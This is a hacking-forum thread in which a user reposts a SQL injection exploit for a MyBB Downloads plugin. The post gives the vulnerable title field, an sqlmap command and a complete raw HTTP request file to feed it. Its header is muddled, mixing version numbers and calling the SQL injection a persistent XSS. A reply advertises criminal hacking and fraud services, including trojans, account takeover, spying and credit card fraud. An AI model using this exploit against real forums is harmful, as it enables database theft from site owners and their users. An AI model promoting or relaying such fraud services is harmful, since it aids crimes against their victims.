MYBB EXPLOIT ATTACK FOR VERSION 2.0.3 !!TESTED :(!!

mesvak

[hide]

# Exploit Title: MyBB Downloads 2.3 - SQL Injection
# Date: 28-10-2018
# Exploit Author: MEsvak lil ass
# Contact: instagram.com/mesvak
# Version: 2.0.3
# Tested on: Ubuntu 18.04

1. Description:  

It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval.  

2. Proof of Concept: 

Persistent XSS  
- Go to downloads.php page  
- Create a New Download  
- Add the following to the title: a"
- Now on submit, the user will be prompted to an SQL Injection specific error.

```
MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1
Query:
SELECT * FROM mybb_downloads WHERE name="a""
```

- THis can be exploited with: sqlmap -r request_file -p name --threads 5

3. Request File example:

POST /downloads.php?newdownload=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/downloads.php?newdownload=1
Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160
Content-Length: 1029
Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="my_post_key"

6cb47e578ed16aa5272c55b0cb8745b4
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="name"

a"
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="shortdesc"

test
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="description"

test
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="image"


-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="url"

1
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="numimages"

4
-----------------------------171894060312075061251712806160
Content-Disposition: form-data; name="submit"

Publish download
-----------------------------171894060312075061251712806160--

[/hide]

this is the plugin that must be on the mybb site to be injected by shitty ass exploit

link

Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD

Ahmad786

This looks interesting, thank you for sharing Heart

Ahmad786

Grey-hat hackers we are specialize in hacking services stated below and more please come with your hacking project for only serious mind. no free jobs

hack fb,twitter accounts and paypal

1.)take control of pc of victim without him knowing

2.)the same with the phone

3.)create virus trojan for work and hide,bind,crypt it in any file (undetectable)

4.)spy on pc and android phone

5.)hack fb,twitter accounts and paypal

6.)website attacks to steal database's

7.) [whatsapp hacker] [snapchat hacker]

8.)Clients based Customization and clearn criminal records from all site

9.)Hacking Iphone ss| SSN | Android based | ip |

spying

10). i will teach you about Bank Hacking Credit Card Hacking in Details

11)Contact me for Western Uninon Transfer Dumps Fullz Bank Logins Paypals

? Credit Cards Loading (Only USA & UK & CANADA "CC's)

No time wasters am here for real business

Contact Detail:

whatsapp : +1 682 302 5207

Discord ID: holyhck#1248

.johnjames

Thsnka asoaa

obsesion

[email protected]

saeedmaster12

Thanks aseas

chiizzaaa

Thanks brother

sekou101

thanks bro foryour help

lunebuvehe

Thanks brother

dafoz

thanks brop :D

DanDeni

great share dude

Sign In

MYBB EXPLOIT ATTACK FOR VERSION 2.0.3 !!TESTED :(!!

Recommended Posts

mesvak 362

Share this post

Link to post

Share on other sites

Ahmad786 8

Share this post

Link to post

Share on other sites

Ahmad786 8

Share this post

Link to post

Share on other sites

.johnjames 1

Share this post

Link to post

Share on other sites

obsesion 3

Share this post

Link to post

Share on other sites

saeedmaster12 1

Share this post

Link to post

Share on other sites

chiizzaaa 2

Share this post

Link to post

Share on other sites

sekou101 1

Share this post

Link to post

Share on other sites

lunebuvehe 3

Share this post

Link to post

Share on other sites

dafoz 0

Share this post

Link to post

Share on other sites

DanDeni 1

Share this post

Link to post

Share on other sites

Join the conversation